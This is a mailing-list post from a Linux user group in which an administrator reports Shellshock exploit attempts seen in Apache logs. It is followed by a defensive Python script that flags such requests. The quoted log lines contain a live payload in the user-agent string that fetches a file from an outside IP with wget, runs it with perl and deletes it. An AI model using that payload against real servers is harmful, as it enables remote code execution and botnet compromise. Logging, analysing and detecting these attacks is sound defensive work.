I have seen numerous attempts in my Apache logs to exploit vulnerable
CGI scripts:
access_log.1.gz:74.201.85.69 - - [26/Sep/2014:07:19:53 -0600] "GET /cgi-bin/php HTTP/1.0" 503 1085 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
access_log.1.gz:74.201.85.69 - - [26/Sep/2014:07:19:53 -0600] "GET /cgi-bin/php.fcgi HTTP/1.0" 503 1095 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
etc. The exploit itself is in the user agent string of the request,
which gets passed to the CGI via an environment variable. Any PHP
script that executes system() will cause the exploit to run as well, as
PHP also puts the user agent string in the environment, which system()
inherits.
Oddly enough I've seen no attempts in the last couple of days. Does
that mean the initial wave was from a single botnet?
Here's an example of the DHCP exploit:
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
Not quite as remotely exploitable but still dangerous.
/*
PLUG: http://plug.org, #utah on irc.freenode.net
Unsubscribe: http://plug.org/mailman/options/plug
Don't fear the penguin.
*/
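
A defender-side check for the kind of log entry quoted in the message above, added here as an example and not part of the original post. It assumes Apache's combined log format without the grep filename prefix; the function name is hypothetical and the sample lines are constructed (documentation addresses, harmless command).

```python
import re

# Apache "combined" format. Quoted fields may contain backslash-escaped
# quotes, exactly as in the logged user agent strings.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# A vulnerable bash treats an environment value that begins with "() {"
# as a function definition. Searching anywhere in the field is
# deliberately broader than that, to catch padded variants.
FUNC_DEF = re.compile(r'\(\)\s*\{')

# Constructed sample lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [26/Sep/2014:07:19:53 -0600] "GET /cgi-bin/php HTTP/1.0" '
    '503 1085 "-" "() { :;}; /bin/bash -c \\"echo probe\\""',
    '192.0.2.11 - - [26/Sep/2014:07:20:01 -0600] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.12 - - [26/Sep/2014:07:21:10 -0600] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 40 "() { :; }; echo probe" "curl/7.30.0"',
]


def find_shellshock_probes(lines):
    """Return one dict per request whose Referer or User-Agent carries a
    bash function-definition prefix. Both headers reach a CGI as
    environment variables, and both are recorded in the combined log."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        fields = [f for f in ("ref", "ua") if FUNC_DEF.search(m.group(f))]
        if fields:
            parts = m.group("req").split(" ")
            hits.append({
                "ip": m.group("ip"),
                "path": parts[1] if len(parts) > 1 else "",
                "status": int(m.group("status")),
                "fields": fields,
            })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE):
        print(hit)
```

The status code is reported only for triage; a 503 or a 200 alone does not show whether the payload ran.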